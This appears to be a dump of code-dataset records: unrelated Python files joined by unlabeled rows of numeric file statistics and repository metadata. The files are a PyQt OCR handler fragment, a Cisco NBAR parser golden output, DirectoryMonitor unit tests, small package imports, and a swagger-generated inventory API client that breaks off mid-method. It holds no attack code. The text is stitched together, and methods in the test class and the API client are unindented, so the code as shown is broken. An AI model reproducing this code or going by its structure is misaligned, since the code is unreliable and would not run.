        self.__show_warning_message_box("未选择图片")
        return
    key_path, _selected_filter = QFileDialog.getOpenFileName(self, "请选择密钥文件", "", "*.npy")
    self.__current_img = img_decoding(self.__current_img, key_path)
    self.showImage(self.__current_img)
@QtCore.pyqtSlot()
def on_btn_ocr_clicked(self):
    """
    Click handler for the "OCR" button: run OCR and show the recognized
    text in a dialog.

    NOTE(review): OCR consumes the raw bytes of the originally opened
    file on disk, not the edited in-memory image — confirm this is
    intended.
    """
    if self.__current_img is None:
        self.__show_warning_message_box("未选择图片")
        return
    # Redundant `img = None` pre-initialization removed: the `with` block
    # always binds img before use.
    with open(self.__original_img_path, 'rb') as fp:
        img = fp.read()
    result = img_ocr(img)
    dialog = OcrDialog()
    dialog.plainTextEdit.setPlainText(result)
    dialog.show()
    dialog.exec_()
| 54.525522
| 116
| 0.679252
| 11,288
| 94,002
| 5.58478
| 0.03579
| 0.150743
| 0.090608
| 0.118923
| 0.857252
| 0.843086
| 0.818372
| 0.806856
| 0.805285
| 0.800828
| 0
| 0.042309
| 0.197666
| 94,002
| 1,723
| 117
| 54.557168
| 0.793546
| 0.014574
| 0
| 0.780275
| 1
| 0.001248
| 0.021818
| 0.001765
| 0
| 0
| 0
| 0
| 0
| 1
| 0.014981
| false
| 0
| 0.006866
| 0
| 0.031835
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
01dfc30ccff4f4b951e8a331b71319e4d867400e
| 6,034
|
py
|
Python
|
src/genie/libs/parser/iosxe/tests/ShowIpNbarDiscovery/cli/equal/golden_output1_expected.py
|
gwoodwa1/genieparser
|
def326da3745c0beb59df575e5f94f9cba961947
|
[
"Apache-2.0"
] | null | null | null |
src/genie/libs/parser/iosxe/tests/ShowIpNbarDiscovery/cli/equal/golden_output1_expected.py
|
gwoodwa1/genieparser
|
def326da3745c0beb59df575e5f94f9cba961947
|
[
"Apache-2.0"
] | null | null | null |
src/genie/libs/parser/iosxe/tests/ShowIpNbarDiscovery/cli/equal/golden_output1_expected.py
|
gwoodwa1/genieparser
|
def326da3745c0beb59df575e5f94f9cba961947
|
[
"Apache-2.0"
] | null | null | null |
# Golden expected structure for the ShowIpNbarDiscovery parser unit test:
# per-interface, per-protocol NBAR packet/byte counters and 5-minute
# (average and max) bit rates, plus a per-interface 'Total' row.
expected_output = {
    'interface': {
        'GigabitEthernet1': {
            'protocol': {
                'ssh': {
                    'in_packet_count': 422,
                    'out_packet_count': 451,
                    'in_byte_count': 3000,
                    'out_byte_count': 4000,
                    'in_5min_bit_rate_bps': 3000,
                    'out_5min_bit_rate_bps': 4000,
                    'in_5min_max_bit_rate_bps': 3000,
                    'out_5min_max_bit_rate_bps': 4000
                },
                'unknown': {
                    'in_packet_count': 215,
                    'out_packet_count': 8,
                    'in_byte_count': 3000,
                    'out_byte_count': 0,
                    'in_5min_bit_rate_bps': 3000,
                    'out_5min_bit_rate_bps': 0,
                    'in_5min_max_bit_rate_bps': 3000,
                    'out_5min_max_bit_rate_bps': 0
                },
                'dns': {
                    'in_packet_count': 42,
                    'out_packet_count': 0,
                    'in_byte_count': 2000,
                    'out_byte_count': 0,
                    'in_5min_bit_rate_bps': 2000,
                    'out_5min_bit_rate_bps': 0,
                    'in_5min_max_bit_rate_bps': 2000,
                    'out_5min_max_bit_rate_bps': 0
                },
                'ldp': {
                    'in_packet_count': 83,
                    'out_packet_count': 81,
                    'in_byte_count': 0,
                    'out_byte_count': 0,
                    'in_5min_bit_rate_bps': 0,
                    'out_5min_bit_rate_bps': 0,
                    'in_5min_max_bit_rate_bps': 0,
                    'out_5min_max_bit_rate_bps': 0
                },
                'eigrp': {
                    'in_packet_count': 84,
                    'out_packet_count': 84,
                    'in_byte_count': 0,
                    'out_byte_count': 0,
                    'in_5min_bit_rate_bps': 0,
                    'out_5min_bit_rate_bps': 0,
                    'in_5min_max_bit_rate_bps': 0,
                    'out_5min_max_bit_rate_bps': 0
                },
                'ospf': {
                    'in_packet_count': 42,
                    'out_packet_count': 42,
                    'in_byte_count': 0,
                    'out_byte_count': 0,
                    'in_5min_bit_rate_bps': 0,
                    'out_5min_bit_rate_bps': 0,
                    'in_5min_max_bit_rate_bps': 0,
                    'out_5min_max_bit_rate_bps': 0
                },
                'ping': {
                    'in_packet_count': 9,
                    'out_packet_count': 9,
                    'in_byte_count': 0,
                    'out_byte_count': 0,
                    'in_5min_bit_rate_bps': 0,
                    'out_5min_bit_rate_bps': 0,
                    'in_5min_max_bit_rate_bps': 0,
                    'out_5min_max_bit_rate_bps': 0
                },
                'Total': {
                    'in_packet_count': 897,
                    'out_packet_count': 675,
                    'in_byte_count': 8000,
                    'out_byte_count': 4000,
                    'in_5min_bit_rate_bps': 8000,
                    'out_5min_bit_rate_bps': 4000,
                    'in_5min_max_bit_rate_bps': 8000,
                    'out_5min_max_bit_rate_bps': 4000
                }
            }
        },
        'GigabitEthernet2': {
            'protocol': {
                'unknown': {
                    'in_packet_count': 213,
                    'out_packet_count': 7,
                    'in_byte_count': 3000,
                    'out_byte_count': 0,
                    'in_5min_bit_rate_bps': 3000,
                    'out_5min_bit_rate_bps': 0,
                    'in_5min_max_bit_rate_bps': 3000,
                    'out_5min_max_bit_rate_bps': 0
                },
                'dns': {
                    'in_packet_count': 42,
                    'out_packet_count': 0,
                    'in_byte_count': 2000,
                    'out_byte_count': 0,
                    'in_5min_bit_rate_bps': 2000,
                    'out_5min_bit_rate_bps': 0,
                    'in_5min_max_bit_rate_bps': 2000,
                    'out_5min_max_bit_rate_bps': 0
                },
                'ldp': {
                    'in_packet_count': 81,
                    'out_packet_count': 83,
                    'in_byte_count': 0,
                    'out_byte_count': 0,
                    'in_5min_bit_rate_bps': 0,
                    'out_5min_bit_rate_bps': 0,
                    'in_5min_max_bit_rate_bps': 0,
                    'out_5min_max_bit_rate_bps': 0
                },
                'eigrp': {
                    'in_packet_count': 84,
                    'out_packet_count': 84,
                    'in_byte_count': 0,
                    'out_byte_count': 0,
                    'in_5min_bit_rate_bps': 0,
                    'out_5min_bit_rate_bps': 0,
                    'in_5min_max_bit_rate_bps': 0,
                    'out_5min_max_bit_rate_bps': 0
                },
                'ospf': {
                    'in_packet_count': 42,
                    'out_packet_count': 42,
                    'in_byte_count': 0,
                    'out_byte_count': 0,
                    'in_5min_bit_rate_bps': 0,
                    'out_5min_bit_rate_bps': 0,
                    'in_5min_max_bit_rate_bps': 0,
                    'out_5min_max_bit_rate_bps': 0
                },
                'Total': {
                    'in_packet_count': 462,
                    'out_packet_count': 216,
                    'in_byte_count': 5000,
                    'out_byte_count': 0,
                    'in_5min_bit_rate_bps': 5000,
                    'out_5min_bit_rate_bps': 0,
                    'in_5min_max_bit_rate_bps': 5000,
                    'out_5min_max_bit_rate_bps': 0
                }
            }
        }
    }
}
| 39.437908
| 53
| 0.402386
| 609
| 6,034
| 3.387521
| 0.073892
| 0.190015
| 0.271449
| 0.202618
| 0.843917
| 0.843917
| 0.836161
| 0.805138
| 0.805138
| 0.767814
| 0
| 0.094517
| 0.507292
| 6,034
| 152
| 54
| 39.697368
| 0.599395
| 0
| 0
| 0.684211
| 0
| 0
| 0.362943
| 0.162413
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
175d635b5dd426759e6383fe94453b69c326058f
| 135
|
py
|
Python
|
mbuild/lib/molecules/__init__.py
|
zijiewu3/mbuild
|
dc6a1053ddec7b5682b0413bd5b2d2a187cd24e8
|
[
"MIT"
] | null | null | null |
mbuild/lib/molecules/__init__.py
|
zijiewu3/mbuild
|
dc6a1053ddec7b5682b0413bd5b2d2a187cd24e8
|
[
"MIT"
] | null | null | null |
mbuild/lib/molecules/__init__.py
|
zijiewu3/mbuild
|
dc6a1053ddec7b5682b0413bd5b2d2a187cd24e8
|
[
"MIT"
] | null | null | null |
"""Library of molecules for mBuild."""
from mbuild.lib.molecules.ethane import Ethane
from mbuild.lib.molecules.methane import Methane
| 33.75
| 48
| 0.807407
| 19
| 135
| 5.736842
| 0.526316
| 0.183486
| 0.238532
| 0.40367
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.096296
| 135
| 3
| 49
| 45
| 0.893443
| 0.237037
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
bd579b66f91b83aea6aaf4097e329f1924d12873
| 8,116
|
py
|
Python
|
components/wifi_server/app_test/test_directory_monitor.py
|
AustinHellerRepo/ArduinoBluetoothInterface
|
4b5a4c94c7111bb3870db6b622809b5dfd497443
|
[
"MIT"
] | 1
|
2021-10-14T20:36:42.000Z
|
2021-10-14T20:36:42.000Z
|
components/wifi_server/app_test/test_directory_monitor.py
|
AustinHellerRepo/DeviceMessagingSystem
|
4b5a4c94c7111bb3870db6b622809b5dfd497443
|
[
"MIT"
] | null | null | null |
components/wifi_server/app_test/test_directory_monitor.py
|
AustinHellerRepo/DeviceMessagingSystem
|
4b5a4c94c7111bb3870db6b622809b5dfd497443
|
[
"MIT"
] | null | null | null |
from app.directory_monitor import DirectoryMonitor
import tempfile
import unittest
import os
import time
import threading
from datetime import datetime
from typing import List
import uuid
def create_random_file_name(directory_path: str, extension: str) -> str:
    """Create an empty file with a random (uuid4-based) name.

    :param directory_path: existing directory that receives the file
    :param extension: suffix appended verbatim (include the leading dot)
    :return: the path of the file that was created
    """
    random_name = f"{uuid.uuid4()}{extension}"
    full_path = os.path.join(directory_path, random_name)
    # Mode "w" creates (or truncates) the file; existence is all we need.
    with open(full_path, "w"):
        pass
    return full_path
class DirectoryMonitorTest(unittest.TestCase):
def test_initialize_0(self):
    """Constructing a DirectoryMonitor over an existing temporary
    directory succeeds and yields a non-None instance."""
    _temp_directory = tempfile.TemporaryDirectory()
    _is_directory_exists = os.path.exists(_temp_directory.name)
    self.assertEqual(True, _is_directory_exists)
    _directory_monitor = DirectoryMonitor(
        directory_path=_temp_directory.name,
        include_subdirectories=False,
        delay_between_checks_seconds=1.0
    )
    self.assertIsNotNone(_directory_monitor)
    _temp_directory.cleanup()
def test_wait_0(self):
    # start, delay too late for change: the file is created at t=1.1 s,
    # just after the monitor's 1.0 s check, so wait() returns at ~1.0 s
    # without having observed any change.
    # NOTE(review): wait() appears to return after the first poll even
    # when nothing changed — confirm against DirectoryMonitor semantics.
    _temp_directory = tempfile.TemporaryDirectory()
    _is_directory_exists = os.path.exists(_temp_directory.name)
    self.assertEqual(True, _is_directory_exists)
    _directory_monitor = DirectoryMonitor(
        directory_path=_temp_directory.name,
        include_subdirectories=False,
        delay_between_checks_seconds=1.0
    )
    self.assertIsNotNone(_directory_monitor)
    _created_temp_file_paths = []  # type: List[str]

    def _change_directory_thread_method():
        # Create the file only after the monitor's first check window.
        time.sleep(1.1)
        _temp_file_path = create_random_file_name(_temp_directory.name, ".txt")
        _created_temp_file_paths.append(_temp_file_path)

    _change_directory_thread = threading.Thread(target=_change_directory_thread_method)
    _change_directory_thread.start()
    _directory_monitor.start()
    _start_time = datetime.utcnow()
    _directory_monitor.wait()
    _end_time = datetime.utcnow()
    _wait_seconds_total = (_end_time - _start_time).total_seconds()
    # Round to one decimal to tolerate scheduling jitter.
    _rounded_wait_seconds_total = round(_wait_seconds_total * 10) / 10
    self.assertEqual(1.0, _rounded_wait_seconds_total)
    self.assertEqual(0, len(_created_temp_file_paths))
    # Let the background thread finish creating its file before cleanup.
    time.sleep(1.0)
    for _temp_file_path in _created_temp_file_paths:
        os.unlink(_temp_file_path)
    _temp_directory.cleanup()
def test_wait_1(self):
    # start, change just before delay, root directory: the file is created
    # at t=0.9 s, before the first 1.0 s check; wait() returns at ~2.0 s.
    # NOTE(review): the 2.0 s expectation suggests the first poll takes a
    # baseline snapshot and the second poll detects the change — confirm
    # against DirectoryMonitor.
    _temp_directory = tempfile.TemporaryDirectory()
    _is_directory_exists = os.path.exists(_temp_directory.name)
    self.assertEqual(True, _is_directory_exists)
    _directory_monitor = DirectoryMonitor(
        directory_path=_temp_directory.name,
        include_subdirectories=False,
        delay_between_checks_seconds=1.0
    )
    self.assertIsNotNone(_directory_monitor)
    _created_temp_file_paths = []  # type: List[str]

    def _change_directory_thread_method():
        # Create the file just before the monitor's first check.
        time.sleep(0.9)
        _temp_file_path = create_random_file_name(_temp_directory.name, ".txt")
        _created_temp_file_paths.append(_temp_file_path)

    _change_directory_thread = threading.Thread(target=_change_directory_thread_method)
    _change_directory_thread.start()
    _directory_monitor.start()
    _start_time = datetime.utcnow()
    _directory_monitor.wait()
    _end_time = datetime.utcnow()
    _wait_seconds_total = (_end_time - _start_time).total_seconds()
    # Round to one decimal to tolerate scheduling jitter.
    _rounded_wait_seconds_total = round(_wait_seconds_total * 10) / 10
    self.assertEqual(2.0, _rounded_wait_seconds_total)
    self.assertEqual(1, len(_created_temp_file_paths))
    for _temp_file_path in _created_temp_file_paths:
        os.unlink(_temp_file_path)
    _temp_directory.cleanup()
def test_wait_2(self):
    # start, change just before delay, multiple files, root directory
    temp_dir = tempfile.TemporaryDirectory()
    self.assertEqual(True, os.path.exists(temp_dir.name))
    monitor = DirectoryMonitor(
        directory_path=temp_dir.name,
        include_subdirectories=False,
        delay_between_checks_seconds=1.0
    )
    self.assertIsNotNone(monitor)
    created_paths = []  # type: List[str]

    def touch_directory_repeatedly():
        # First change lands just inside the first window; every later
        # change keeps the monitor busy for one more full delay each.
        pause = 0.9
        for _ in range(10):
            time.sleep(pause)
            pause = 1.0
            created_paths.append(create_random_file_name(temp_dir.name, ".txt"))

    worker = threading.Thread(target=touch_directory_repeatedly)
    worker.start()
    monitor.start()
    started = datetime.utcnow()
    monitor.wait()
    elapsed = (datetime.utcnow() - started).total_seconds()
    self.assertEqual(11.0, round(elapsed * 10) / 10)
    self.assertEqual(10, len(created_paths))
    for path in created_paths:
        os.unlink(path)
    temp_dir.cleanup()
def test_wait_3(self):
    # start, change just before delay, multiple files, ignore sub directories
    temp_dir = tempfile.TemporaryDirectory()
    self.assertEqual(True, os.path.exists(temp_dir.name))
    monitor = DirectoryMonitor(
        directory_path=temp_dir.name,
        include_subdirectories=False,
        delay_between_checks_seconds=1.0
    )
    self.assertIsNotNone(monitor)
    created_paths = []  # type: List[str]

    def touch_nested_directories():
        try:
            # Each iteration writes a file, then descends into a freshly
            # created sub directory; only the first file is in the root,
            # so a non-recursive monitor should stop waiting after it.
            pause = 0.5
            target_dir = temp_dir.name
            for _ in range(10):
                time.sleep(pause)
                pause = 1.0
                new_file = create_random_file_name(target_dir, ".txt")
                target_dir = os.path.join(target_dir, str(uuid.uuid4()))
                os.mkdir(target_dir)
                created_paths.append(new_file)
        except Exception as ex:
            print(f"ex: {ex}")

    worker = threading.Thread(target=touch_nested_directories)
    worker.start()
    monitor.start()
    started = datetime.utcnow()
    monitor.wait()
    elapsed = (datetime.utcnow() - started).total_seconds()
    rounded_elapsed = round(elapsed * 10) / 10
    # Let the worker finish all ten iterations before asserting counts.
    time.sleep(9.0)
    self.assertEqual(2.0, rounded_elapsed)
    self.assertEqual(10, len(created_paths))
    for path in created_paths:
        os.unlink(path)
    temp_dir.cleanup()
def test_wait_4(self):
    # start, change just before delay, multiple files, inspect sub directories
    temp_dir = tempfile.TemporaryDirectory()
    self.assertEqual(True, os.path.exists(temp_dir.name))
    monitor = DirectoryMonitor(
        directory_path=temp_dir.name,
        include_subdirectories=True,
        delay_between_checks_seconds=1.0
    )
    self.assertIsNotNone(monitor)
    created_paths = []  # type: List[str]

    def touch_nested_directories():
        try:
            # Files go into progressively deeper sub directories; with
            # include_subdirectories=True the monitor sees every change
            # and keeps waiting until the worker stops.
            pause = 0.5
            target_dir = temp_dir.name
            for _ in range(10):
                time.sleep(pause)
                pause = 1.0
                new_file = create_random_file_name(target_dir, ".txt")
                target_dir = os.path.join(target_dir, str(uuid.uuid4()))
                os.mkdir(target_dir)
                created_paths.append(new_file)
        except Exception as ex:
            print(f"ex: {ex}")

    worker = threading.Thread(target=touch_nested_directories)
    worker.start()
    monitor.start()
    started = datetime.utcnow()
    monitor.wait()
    elapsed = (datetime.utcnow() - started).total_seconds()
    self.assertEqual(11.0, round(elapsed * 4) / 4)
    self.assertEqual(10, len(created_paths))
    for path in created_paths:
        os.unlink(path)
    temp_dir.cleanup()
if __name__ == "__main__":
    # Run the test suite when this module is executed directly.
    unittest.main()
| 28.180556
| 85
| 0.782898
| 1,064
| 8,116
| 5.420113
| 0.098684
| 0.055488
| 0.05202
| 0.06936
| 0.921796
| 0.917808
| 0.896827
| 0.890064
| 0.867696
| 0.867696
| 0
| 0.012046
| 0.130606
| 8,116
| 287
| 86
| 28.278746
| 0.805272
| 0.045466
| 0
| 0.791667
| 0
| 0
| 0.009049
| 0.003232
| 0
| 0
| 0
| 0
| 0.114583
| 1
| 0.0625
| false
| 0.005208
| 0.046875
| 0
| 0.119792
| 0.010417
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
bd77128afb1e7526e0ac40ccdb59a2faf89575c7
| 114
|
py
|
Python
|
gefry3/classes/__init__.py
|
jasonmhite/gefry3
|
4ebe0d456fd45b55a43769bb41b7cac7f9307ff3
|
[
"BSD-2-Clause"
] | 1
|
2019-06-26T19:52:56.000Z
|
2019-06-26T19:52:56.000Z
|
gefry3/classes/__init__.py
|
jasonmhite/gefry3
|
4ebe0d456fd45b55a43769bb41b7cac7f9307ff3
|
[
"BSD-2-Clause"
] | 3
|
2018-02-04T21:52:43.000Z
|
2018-08-21T19:04:59.000Z
|
gefry3/classes/__init__.py
|
jasonmhite/gefry3
|
4ebe0d456fd45b55a43769bb41b7cac7f9307ff3
|
[
"BSD-2-Clause"
] | 2
|
2017-10-03T14:58:39.000Z
|
2018-09-29T21:05:33.000Z
|
from gefry3.classes.material import *
from gefry3.classes.geometry import *
from gefry3.classes.hardware import *
| 28.5
| 37
| 0.815789
| 15
| 114
| 6.2
| 0.466667
| 0.322581
| 0.548387
| 0.494624
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.029412
| 0.105263
| 114
| 3
| 38
| 38
| 0.882353
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
bd99fb53ad3c05865b9103842300aab91aff2c53
| 111,532
|
py
|
Python
|
InventoryClient/apis/default_api.py
|
Orkiv/Inventory-python-client
|
92724345f48f53693d582a9f4389296dda54eeb1
|
[
"Apache-2.0"
] | null | null | null |
InventoryClient/apis/default_api.py
|
Orkiv/Inventory-python-client
|
92724345f48f53693d582a9f4389296dda54eeb1
|
[
"Apache-2.0"
] | null | null | null |
InventoryClient/apis/default_api.py
|
Orkiv/Inventory-python-client
|
92724345f48f53693d582a9f4389296dda54eeb1
|
[
"Apache-2.0"
] | null | null | null |
# coding: utf-8
"""
InventoryAPI
Orkiv Inventory API client
OpenAPI spec version: 1.0.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from __future__ import absolute_import
import sys
import os
import re
# python 2 and python 3 compatibility library
from six import iteritems
from ..configuration import Configuration
from ..api_client import ApiClient
class DefaultApi(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
    """
    Create the API wrapper.

    :param api_client: explicit ApiClient to use; when omitted, the
        shared Configuration's client is used (created on first need).
    """
    configuration = Configuration()
    if api_client:
        self.api_client = api_client
        return
    if not configuration.api_client:
        configuration.api_client = ApiClient()
    self.api_client = configuration.api_client
def all_get(self, **kwargs):
    """
    Fetch all inventory groups.

    Synchronous by default; pass a `callback` function keyword to make
    the request asynchronously, in which case the request thread is
    returned and the callback receives the response.

    :param callback function: The callback function
        for asynchronous request. (optional)
    :return: list[InventoryGroup]
    """
    kwargs['_return_http_data_only'] = True
    if kwargs.get('callback'):
        return self.all_get_with_http_info(**kwargs)
    return self.all_get_with_http_info(**kwargs)
def all_get_with_http_info(self, **kwargs):
    """
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please define a `callback` function
    to be invoked when receiving the response.
    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.all_get_with_http_info(callback=callback_function)

    :param callback function: The callback function
        for asynchronous request. (optional)
    :return: list[InventoryGroup]
        If the method is called asynchronously,
        returns the request thread.
    """
    # Keyword arguments this endpoint accepts; anything else raises.
    all_params = []
    all_params.append('callback')
    all_params.append('_return_http_data_only')

    # Snapshot the local namespace so declared args and kwargs can be
    # read uniformly below. NOTE(review): relies on locals() semantics —
    # statement order here must not change.
    params = locals()
    for key, val in iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method all_get" % key
            )
        params[key] = val
    del params['kwargs']

    resource_path = '/all/'.replace('{format}', 'json')
    path_params = {}

    query_params = {}

    header_params = {}

    form_params = []
    local_var_files = {}

    body_params = None

    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.\
        select_header_accept(['application/json'])
    if not header_params['Accept']:
        del header_params['Accept']

    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.\
        select_header_content_type([])

    # Authentication setting
    auth_settings = ['APIKey', 'AccountID']

    # Delegate the actual HTTP call to the shared ApiClient.
    return self.api_client.call_api(resource_path, 'GET',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=body_params,
                                    post_params=form_params,
                                    files=local_var_files,
                                    response_type='list[InventoryGroup]',
                                    auth_settings=auth_settings,
                                    callback=params.get('callback'),
                                    _return_http_data_only=params.get('_return_http_data_only'))
def categories_delete(self, id, **kwargs):
    """
    Remove the category identified by *id*.

    Synchronous by default; pass a `callback` function keyword to make
    the request asynchronously, in which case the request thread is
    returned and the callback receives the response.

    :param str id: Id of category to remove (required)
    :param callback function: The callback function
        for asynchronous request. (optional)
    :return: Response
    """
    kwargs['_return_http_data_only'] = True
    if kwargs.get('callback'):
        return self.categories_delete_with_http_info(id, **kwargs)
    return self.categories_delete_with_http_info(id, **kwargs)
def categories_delete_with_http_info(self, id, **kwargs):
    """
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please define a `callback` function
    to be invoked when receiving the response.
    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.categories_delete_with_http_info(id, callback=callback_function)

    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str id: Id of category to remove (required)
    :return: Response
        If the method is called asynchronously,
        returns the request thread.
    """
    # Keyword arguments this endpoint accepts; anything else raises.
    all_params = ['id']
    all_params.append('callback')
    all_params.append('_return_http_data_only')

    # Snapshot the local namespace so declared args and kwargs can be
    # read uniformly below. NOTE(review): relies on locals() semantics —
    # statement order here must not change.
    params = locals()
    for key, val in iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method categories_delete" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'id' is set
    if ('id' not in params) or (params['id'] is None):
        raise ValueError("Missing the required parameter `id` when calling `categories_delete`")

    resource_path = '/categories/'.replace('{format}', 'json')
    path_params = {}

    query_params = {}
    # 'id' travels as a query-string parameter, not in the body.
    if 'id' in params:
        query_params['id'] = params['id']

    header_params = {}

    form_params = []
    local_var_files = {}

    body_params = None

    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.\
        select_header_accept(['application/json'])
    if not header_params['Accept']:
        del header_params['Accept']

    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.\
        select_header_content_type([])

    # Authentication setting
    auth_settings = ['APIKey', 'AccountID']

    # Delegate the actual HTTP call to the shared ApiClient.
    return self.api_client.call_api(resource_path, 'DELETE',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=body_params,
                                    post_params=form_params,
                                    files=local_var_files,
                                    response_type='Response',
                                    auth_settings=auth_settings,
                                    callback=params.get('callback'),
                                    _return_http_data_only=params.get('_return_http_data_only'))
def categories_post(self, **kwargs):
    """
    Query categories against the system.

    Synchronous by default; pass a `callback` function keyword to make
    the request asynchronously, in which case the request thread is
    returned and the callback receives the response.

    :param Category query: Category to query against system
    :param callback function: The callback function
        for asynchronous request. (optional)
    :return: list[Category]
    """
    kwargs['_return_http_data_only'] = True
    if kwargs.get('callback'):
        return self.categories_post_with_http_info(**kwargs)
    return self.categories_post_with_http_info(**kwargs)
def categories_post_with_http_info(self, **kwargs):
    """
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please define a `callback` function
    to be invoked when receiving the response.
    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.categories_post_with_http_info(callback=callback_function)

    :param callback function: The callback function
        for asynchronous request. (optional)
    :param Category query: Category to query against system
    :return: list[Category]
        If the method is called asynchronously,
        returns the request thread.
    """
    # Keyword arguments this endpoint accepts; anything else raises.
    all_params = ['query']
    all_params.append('callback')
    all_params.append('_return_http_data_only')

    # Snapshot the local namespace so declared args and kwargs can be
    # read uniformly below. NOTE(review): relies on locals() semantics —
    # statement order here must not change.
    params = locals()
    for key, val in iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method categories_post" % key
            )
        params[key] = val
    del params['kwargs']

    resource_path = '/categories/'.replace('{format}', 'json')
    path_params = {}

    query_params = {}

    header_params = {}

    form_params = []
    local_var_files = {}

    body_params = None
    # Optional 'query' object is sent as the request body.
    if 'query' in params:
        body_params = params['query']

    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.\
        select_header_accept(['application/json'])
    if not header_params['Accept']:
        del header_params['Accept']

    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.\
        select_header_content_type([])

    # Authentication setting
    auth_settings = ['APIKey', 'AccountID']

    # Delegate the actual HTTP call to the shared ApiClient.
    return self.api_client.call_api(resource_path, 'POST',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=body_params,
                                    post_params=form_params,
                                    files=local_var_files,
                                    response_type='list[Category]',
                                    auth_settings=auth_settings,
                                    callback=params.get('callback'),
                                    _return_http_data_only=params.get('_return_http_data_only'))
def categories_put(self, id, category, **kwargs):
    """
    Update the category identified by *id* with new information.
    If no ID is specified a new category will be created!

    Synchronous by default; pass a `callback` function keyword to make
    the request asynchronously, in which case the request thread is
    returned and the callback receives the response.

    :param str id: category id to update. (required)
    :param Category category: New category information. (required)
    :param callback function: The callback function
        for asynchronous request. (optional)
    :return: Category
    """
    kwargs['_return_http_data_only'] = True
    if kwargs.get('callback'):
        return self.categories_put_with_http_info(id, category, **kwargs)
    return self.categories_put_with_http_info(id, category, **kwargs)
def categories_put_with_http_info(self, id, category, **kwargs):
    """
    If no ID is specified a new category will be created!
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please define a `callback` function
    to be invoked when receiving the response.
    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.categories_put_with_http_info(id, category, callback=callback_function)

    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str id: category id to update. (required)
    :param Category category: New category information. (required)
    :return: Category
        If the method is called asynchronously,
        returns the request thread.
    """
    # Keyword arguments this endpoint accepts; anything else raises.
    all_params = ['id', 'category']
    all_params.append('callback')
    all_params.append('_return_http_data_only')

    # Snapshot the local namespace so declared args and kwargs can be
    # read uniformly below. NOTE(review): relies on locals() semantics —
    # statement order here must not change.
    params = locals()
    for key, val in iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method categories_put" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'id' is set
    if ('id' not in params) or (params['id'] is None):
        raise ValueError("Missing the required parameter `id` when calling `categories_put`")
    # verify the required parameter 'category' is set
    if ('category' not in params) or (params['category'] is None):
